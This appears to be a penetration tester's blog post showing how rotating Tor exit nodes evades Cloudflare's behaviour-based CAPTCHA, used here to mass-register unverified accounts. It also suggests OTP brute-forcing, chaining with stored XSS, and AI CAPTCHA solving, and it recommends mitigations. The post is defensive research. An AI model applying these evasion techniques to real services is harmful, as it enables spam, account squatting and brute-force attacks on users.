In this era, threat actors have proven to be tireless in their pursuit of exploiting vulnerabilities and gaining unauthorized access to online platforms using anything from simple to sophisticated attacks. Today, we delve into shedding light on how attackers employ methods to bypass one of the most common defenses against automated attacks. Particularly on using TOR networks to evade or bypass CAPTCHA.
CAPTCHA
Figure 1. Some examples of CAPTCHA and verification challenges
Completely Automated Public Turing test to tell Computers and Humans Apart (CAPTCHA), is a well-known security control we often see to protect applications from automated attacks. It presents challenges to users visiting a website to ensure they are human and not automated scripts or bots. The most common challenge is the "I'm not a robot" checkbox or a CAPTCHA challenge that requires users to solve puzzles, identify objects in images, or perform other tasks that are difficult for automated scripts to complete.
Cloudflare
Figure 2. Simple illustration of the Cloudflare model
Cloudflare provides a wide range of website security and performance services, primarily focused on optimizing websites, mobile applications, and other online services against online attacks. Another great thing about Cloudflare is it acts as a reverse proxy and content delivery network (CDN) for online applications. It also conceals the source addresses of the origin server, providing an additional layer of security that hides the actual server's IP address from potential threat actors. There are also various security features, including DDoS protection, a web application firewall (WAF), and bot mitigation, to name a few.
By implementing Cloudflare CAPTCHA, website owners can reduce the risk of spam submissions, brute force attacks, and other malicious activities that can disrupt their online services. It helps maintain the integrity and security of websites by verifying the authenticity of incoming traffic.
TOR
Figure 3. Illustration of a user browsing website over Tor
TOR, short for 'The Onion Router,' is a free and open-source software project initially developed by the U.S. Navy for online privacy and anonymity. It achieves this by routing Internet traffic through a network of volunteer-operated servers referred to as 'nodes' or 'relays'. It is worth noting that TOR is also used for accessing the dark web, a portion of the Internet that is not indexed by traditional search engines and may host websites and services associated with various activities, including those of a questionable or illegal nature.
Evasion/Bypass
While doing a bit of research, I discovered how to evade or bypass Cloudflare’s CAPTCHA challenge.
Upon investigating an application, I saw that the CAPTCHA was missing for the login and registration pages, but as it turned out, CAPTCHA was lurking ahead.
Figure 4. The application login page without CAPTCHA implemented
Figure 5. The application registration page without CAPTCHA implemented
I signed up for test accounts on the target app without any issues using my email aliases. Shortly afterwards, I found there were no validation or verification mechanism links sent via email. Since the registered account was usable without verification, it follows that any non-registered email or invalid (non-existing) email can be used for registration. This security control gap could pose a serious threat if chained to other issues like missing or weak CAPTCHA, username enumeration, no account lockout, no rate-limiting, etc. So, I decided to create a POC to demonstrate the impact of this security flaw.
Figure 6. Landing page after successful registration
I thought this would be a straightforward process. However, I recalled from the reconnaissance results that the application uses Cloudflare, and as a Cloudflare user myself, I thought there should be some mildly amusing security controls in play.
Figure 7. Initial automated registration PoC showing that requests were redirected to /challenge (CAPTCHA challenge) page
I tried automating registration and was not surprised with the result. I tried again using various tweaks, including variations in delays and threads, hoping that those would suffice. But still, no luck.
Figure 8. Example application response with CAPTCHA challenge
Macros could be useful, but I wanted a fully automated demonstration. Hopping in and out of the application using our source addresses, I was again able to register accounts.
To get a better grasp of what we’re up against, I logged in to my Cloudflare account to browse and see the available configurations, etc.
Figure 9. CAPTCHA customization for application page(s)
Figure 10. CAPTCHA customization preview
I found out that Cloudflare has challenge page customization for non-free subscriptions. Below are the customizable challenge inclusions:
- cf-error:1000s
- block:ip-ban
- block:rate-limit
- block:client-auth
- block:basic-sec-captcha
- block:country-captcha
- block:adv-sec-captcha
- block:waf
- block:iuam-basic
- cf-error:500s
- always-online:no-copy
- phishing:warn
- regulation:block
So, at this point, we know that Cloudflare is intervening with automated requests with IP-based limiting. I also found that Cloudflare allows connections from TOR users by default. Then I remembered this one simple piece of script I created for a research project.
PoC
Figure 11. Simplified illustration of the attack
The idea is quite simple. Use a different source address for every transaction using TOR. This is another technique used for brute-forcing OTP (one-time pin) or OTC (one-time code) and other two-factor authentications. This trick could also work for various injection attacks. One researcher previously published on using AWS to brute-force iTunes’ or iCloud’s OTPs for better control. Despite limitations, TOR is easily accessible and makes it easier for everyone to accomplish or simulate these kinds of attacks.
Figure 12. Shows example script used.
As an option, we can use Nxt to monitor the circuit, events, logs, and get new IP addresses on-demand. In this instance, the code above would suffice for our purposes.
Figure 13. Shows nxt monitoring view
Here we can see the script execution without HTTP 302 redirections to the CAPTCHA challenge page.
Figure 14. automated registration of accounts using TOR
We know that we’ve succeeded because the registration notifications are in!
Figure 15. example notification emails received
In the demonstration above, the CAPTCHA implementation in Cloudflare’s challenge was not set to always require CAPTCHA but was dependent on the user's behavior. Using TOR, we have avoided it by hopping randomly through hundreds of available TOR exit nodes.
Anyhow, the solution is quite simple. One is to always require CAPTCHA for pages that can be exploited by unauthenticated users, like registration pages. Use a hard-coded CAPTCHA when possible, along with other security controls like CSRF tokens and rate-limiting.
Additionally, if we want to block TOR sources when using Cloudflare, there is a simple way to block all exit nodes being advertised on torproject.org. Cloudflare uses the “T1” code for Tor. So, we can create a rule to block it.
Figure 16. number of available exit nodes from torproject.org
Figure 17. shows example of creating a rule to block TOR source addresses
Figure 18. Error being shown to users accessing after blocking
I want to highlight the importance of identity or account verification. Although it won’t always pose a high risk as is, allowing account registrations without proper verification could be troublesome.
We can also view this as a toned-down DoS attack. For example, if an attacker can register accounts (email) ahead of the actual owners, the owner of the email would need to take additional steps to recover their accounts, especially if the affected app does not have password reset functionality. The users would take additional steps, like contacting support, etc. In addition, insecure registration functionalities could aid any threat actors’ phishing campaigns, malware distribution, etc.
In another attack-chain use case, if a targeted application is vulnerable to other attack vectors such as cross-site scripting (XSS), the actor can register using the victim’s email or register accounts using dumped emails, etc., and add malicious payloads to the user-accessible areas, such as the account profile section. When the account owner initiates a password reset and gains control of the account, the payload will then execute in the victim’s context.
Proper implementation of CAPTCHA elevates the overall security of applications. Having properly implemented 2FAs, MFAs, and OTCs and account verifications should also be considered.
AI VS CAPTCHA
I remember when I first had a flatbed scanner back in the mid-2000s. It came with a CD containing driver software, an image scanning editor, and OCR software. I still remember the name “OmniPage.” OCR stands for "Optical Character Recognition." It is a long-existing technology that detects text in images. It is commonly used to convert scanned documents or images into digital text. I was so amazed and perplexed at the same time back then by how it functions. Today, we can use our phones to convert images to text and even translate them in real-time.
Figure 19. Example of using OCR to solve arithmetic-based CAPTCHA using a script
Now, AI can be used to solve CAPTCHA challenges to some extent by using OCR and other complex algorithms. While traditional CAPTCHAs were initially designed to be difficult for automated scripts to solve, advancements in AI and machine learning have made it possible to develop algorithms and models that can recognize and solve certain types of CAPTCHAs with a high degree of accuracy and efficiency. There are companies offering CAPTCHA solving as a service using AI.
Figure 20. Some examples of CAPTCHA challenges claimed to be solvable by AI
Conclusion
It is a fact that AI and Quantum computing have opened a new paradigm in cybersecurity, including automation against applications. Threat actors can abuse them in several ways. For example, they can be used to spam websites or services, disrupt user experiences, and perform brute-force attacks on login and registration forms. Automated CAPTCHA solving may also enable unauthorized data scraping, potentially violating terms of service and legal agreements. While there are legitimate uses for CAPTCHA-solving automation, it is essential to deploy it responsibly and within legal and ethical boundaries. As we explore the evolving role of CAPTCHA, MFAs/2FAs among other security controls, security engagements such as penetration testing and collective research propel improvements to secure applications and systems against the onslaught of automation.
